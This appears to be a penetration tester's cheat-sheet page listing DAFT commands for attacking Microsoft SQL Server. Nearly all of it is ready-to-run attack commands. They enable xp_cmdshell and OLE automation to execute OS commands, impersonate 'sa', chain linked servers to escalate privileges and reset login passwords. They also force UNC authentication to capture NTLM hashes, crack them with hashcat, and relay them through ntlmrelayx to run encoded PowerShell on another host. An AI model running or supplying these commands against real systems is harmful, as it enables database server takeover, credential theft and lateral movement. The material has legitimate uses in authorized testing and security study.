DAFT Commands

Generic Info

daft.exe -i <SQL SERVER> -d master -m query -q "select system_user;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT LEFT(@@version, CHARINDEX(' - ', @@version)) ProductName;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT IS_SRVROLEMEMBER('sysadmin');"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT IS_SRVROLEMEMBER('sysadmin');"

List Databases and Owners

DAFT.exe -i <SQL SERVER> -d master -m Database | findstr "DatabaseName && DatabaseOwner"

Checks for some Excessive Privileges, only found Database Ownership Chaining

DAFT.exe -i <SQL SERVER> -d master -m AuditPrivDbChaining

Basic server information

DAFT.exe -i <SQL SERVER> -d master -m ServerInfo

Lists links

DAFT.exe -i <SQL SERVER> -d master -m ServerLink

Link crawling

DAFT.exe -i <SQL SERVER> -d master -m ServerLinkCrawl

Lists granted permissions

DAFT.exe -i <SQL SERVER> -d master -m ServerPriv

Lists sysadmins

DAFT.exe -i <SQL SERVER> -d master -m ServerRoleMember

Using specific DB Creds

daft.exe -i <SQL SERVER> -d master -e USER:PASSWORD -m query -q "EXEC ('xp_cmdshell ''whoami'';') AT <SQL SERVER>;"

Impersonation

daft.exe -i <SQL SERVER> -d msdb -m query -q "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Found this uncertain of output exactly

daft.exe -i <SQL SERVER> -d music -m query -q "SELECT grantee_principal.name AS WhoCanImpersonate ,grantee_principal.type_desc AS ImpersonatorType ,sp.name AS WhoCanTheyImpersonate ,sp.type_desc AS ImpersonateeLoginType FROM sys.server_permissions AS prmssn INNER JOIN sys.server_principals AS sp ON sp.principal_id = prmssn.major_id AND prmssn.class = 101 INNER JOIN sys.server_principals AS grantee_principal ON grantee_principal.principal_id = prmssn.grantee_principal_id WHERE prmssn.state = 'G'"

Change a users password

daft.exe -i <SQL SERVER> -d master -m query -q "ALTER LOGIN sqlUsername WITH PASSWORD = N'qwer1234QWER!@#$';"

OLE Stored Procedure

daft.exe -i <SQL SERVER> -d master -e 'USERNAME:PASSWORD' -m query -q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null,'ping 192.168.49.59'"

XP cmd shell

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'show advanced options', 1; reconfigure;'"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'xp_cmdshell', 1; reconfigure;'"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC xp_cmdshell 'whoami';"

COMMAND EXECUTION - LOCAL - XP COMMAND SHELL

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell ipconfig;"

UNC Injection

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master..xp_dirtree \"\\192.168.X.Y\test\";"

Capture NTLM Relay hash

Set up responder ad get NTML relay hash

responder -I tun0

crack it with hashcat

 hashcat -m 5600 sqlsvc_hash.txt /usr/share/wordlists/rockyou.txt --force

Relay hash for code execution

impacket ntlmrelay

python3 ntlmrelayx.py --no-http-server -smb2support -t 172.16.98.152 -c 'powershell -enc <ENDOCDED COMMAND>'

DAFT Built in CMD Execution

daft.exe -i "<SQL SERVER>" -m OSCmd -q whoami

Linked PrivEsc

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''xp_cmdshell ''''whoami'''';'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

Linked Servers XP cmd shell

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('xp_cmdshell ''" + command + "'';') AT <SQL SERVER>;"

Linked Servers xp cmd shell - openquery

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC master..xp_cmdshell ''whoami'';')"

**
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT * FROM OPENQUERY([<SQL SERVER>],'Select @@Servername SYSTEM_USER')"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedserver @server = N'<SQL SERVER>', @provider=N'SQLNCLI', @datasrc=N'<SQL SERVER>';" 

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedsrvlogin @rmtsrvname = 
N'<SQL SERVER>', @locallogin = NULL , @useself = N'True', @rmtuser=N'asdf',@rmtpassword=N'asdfasdfasdf';;"

ALTER Role cmd

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('ALTER ROLE db_owner ADD MEMBER aids;') AT <SQL SERVER>;"

Enable RPC

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption '<SQLSERVER>', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQLSERVER>;"

PreviousBloodHound NextEnumeration Commands

Last updated 4 years ago

hashtagGeneric Info

hashtagList Databases and Owners

hashtagChecks for some Excessive Privileges, only found Database Ownership Chaining

hashtagBasic server information

hashtagLists links

hashtagLink crawling

hashtagLists sysadmins

hashtagUsing specific DB Creds

hashtagImpersonation

hashtagFound this uncertain of output exactly

hashtagChange a users password

hashtagOLE Stored Procedure

hashtagXP cmd shell

hashtagCOMMAND EXECUTION - LOCAL - XP COMMAND SHELL

hashtagUNC Injection

hashtagCapture NTLM Relay hash

hashtagRelay hash for code execution

hashtagDAFT Built in CMD Execution

hashtagLinked PrivEsc

hashtagLinked Servers XP cmd shell

hashtagLinked Servers xp cmd shell - openquery

hashtagAdd Linkded Login

hashtagALTER Role cmd

hashtagEnable RPC

Generic Info

List Databases and Owners

Checks for some Excessive Privileges, only found Database Ownership Chaining

Basic server information

Lists links

Link crawling

Lists sysadmins

Using specific DB Creds

Impersonation

Found this uncertain of output exactly

Change a users password

OLE Stored Procedure

XP cmd shell

COMMAND EXECUTION - LOCAL - XP COMMAND SHELL

UNC Injection

Capture NTLM Relay hash

Relay hash for code execution

DAFT Built in CMD Execution

Linked PrivEsc

Linked Servers XP cmd shell

Linked Servers xp cmd shell - openquery

Add Linkded Login

ALTER Role cmd

Enable RPC